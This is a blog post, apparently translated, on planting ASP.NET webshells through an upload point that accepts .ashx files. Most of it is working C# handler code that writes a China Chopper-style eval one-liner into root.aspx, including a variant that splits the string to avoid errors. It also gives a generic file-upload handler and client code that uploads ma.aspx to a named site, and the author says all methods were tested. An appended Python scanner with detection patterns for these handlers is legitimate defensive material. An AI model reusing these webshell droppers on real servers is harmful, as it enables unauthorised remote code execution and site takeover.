
Exposing How Attackers Use Ashx Scripts to Write Aspx Trojans: A Summary of Methods

admin | Security Protection | 2022-12-30 | 374 views | 0

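.Net environment. The upload point did not restrict Ashx and Asmx. The latter could not run after upload, with a message that Asmx scripts can only run locally, so I planned to upload an Ashx script first and then generate an Aspx file in the current directory (the target cannot execute Asp files). I found the following Ashx code online: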

<%@ WebHandler Language="C#" Class="Handler" %>

using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {

    public void ProcessRequest(HttpContext context) {
        context.Response.ContentType = "text/plain";

        StreamWriter file1 = File.CreateText(context.Server.MapPath("root.aspx"));
        file1.Write("<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"pass\"],\"unsafe\");%>");
        file1.Flush();
        file1.Close();

    }

    public bool IsReusable {
        get {
            return false;
        }
    }

}

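I changed the Asp one-liner in the script to the China Chopper Aspx one-liner, but it threw an error when executed, saying unknown directive @Page. So I solved it in the following 2 ways:

1. Join the string with String concatenation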

<%@ WebHandler Language="C#" Class="Handler" %>

using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {

    public void ProcessRequest(HttpContext context) {
        context.Response.ContentType = "text/plain";
        string show = "<%@ Page Language=\"Jscript\"%" + "><%eval(Request.Item" + "[\"chopper\"]" + ",\"unsafe\");%>";
        StreamWriter file1 = File.CreateText(context.Server.MapPath("root.aspx"));
        file1.Write(show);
        file1.Flush();
        file1.Close();

    }

    public bool IsReusable {
        get {
            return false;
        }
    }

}

2. A clumsier method; see the code

<%@ WebHandler Language="C#" Class="Uploader" %>
using System;
using System.IO;
using System.Web;

public class Uploader : IHttpHandler
{
    public void ProcessRequest(HttpContext hc)
    {
        foreach (string fileKey in hc.Request.Files)
        {
            HttpPostedFile file = hc.Request.Files[fileKey];
            file.SaveAs(Path.Combine(hc.Server.MapPath("."), file.FileName));
        }
    }

    public bool IsReusable
    {
        get { return true; }
    }
}

Then create a WinForm program in VS and write this in the main function:

System.Net.WebClient myWebClient = new System.Net.WebClient();

myWebClient.UploadFile("http://www.xcnzz.com/Uploader.ashx", "POST", "C:\\ma.aspx");

Run it and that is all. All of the methods above were tested successfully.
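A defender-side check for the handlers shown above, as an added example that is not part of the original post: a Python scanner for `.ashx` source that collapses string concatenation before matching, so a payload split across literals as in method 1 is still flagged. The rule names, the `scan` function and the sample snippets are constructed for illustration.

```python
import re

# Collapse C# literal concatenation ("..." + "...") so a payload split across
# several literals, as in method 1 above, is matched as one string.
CONCAT = re.compile(r'"\s*\+\s*"')
WS = re.compile(r"\s+")

RULES = {
    # JScript eval of a request item in "unsafe" mode (the dropped one-liner)
    "jscript-eval-request": re.compile(
        r'eval\s*\(\s*Request\.Item\s*\[[^\]]*\]\s*,\s*\\?"unsafe', re.I),
    # A page directive carried inside a string literal of the handler
    "embedded-page-directive": re.compile(r'"[^"]*<%@\s*Page\b', re.I),
    # Handler creates a server-side script file through Server.MapPath
    "writes-script-file": re.compile(
        r'(CreateText|WriteAllText)\s*\([^;]*?MapPath\s*\(\s*"[^"]*\.as[hmp]x"', re.I),
    # Upload stored under the client-supplied file name (method 2)
    "saveas-client-filename": re.compile(r'\.SaveAs\s*\([^;]*?\.FileName', re.I),
}

def scan(source: str) -> list:
    """Return the sorted names of the rules that match a handler's source."""
    flat = WS.sub(" ", CONCAT.sub("", source))
    return sorted(name for name, rx in RULES.items() if rx.search(flat))

# Constructed samples (not taken from a real server); "k" is a placeholder.
SPLIT_DROPPER = r'''
string show = "<%@ Page Language=\"Jscript\"%" + "><%eval(Request.Item" + "[\"k\"]" + ",\"unsafe\");%>";
StreamWriter f = File.CreateText(context.Server.MapPath("root.aspx"));
f.Write(show);
'''
UPLOADER = r'''
HttpPostedFile file = hc.Request.Files[fileKey];
file.SaveAs(Path.Combine(hc.Server.MapPath("."), file.FileName));
'''
BENIGN = r'''
context.Response.ContentType = "text/plain";
context.Response.Write("ok" + " " + DateTime.UtcNow);
'''

if __name__ == "__main__":
    for name, src in [("split", SPLIT_DROPPER), ("upload", UPLOADER), ("benign", BENIGN)]:
        print(name, scan(src))
```

The root cause on the page is the upload point accepting `.ashx`; a scanner like this only finds handlers after the fact, so an extension allowlist and an upload directory with no script handlers remain the primary controls.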
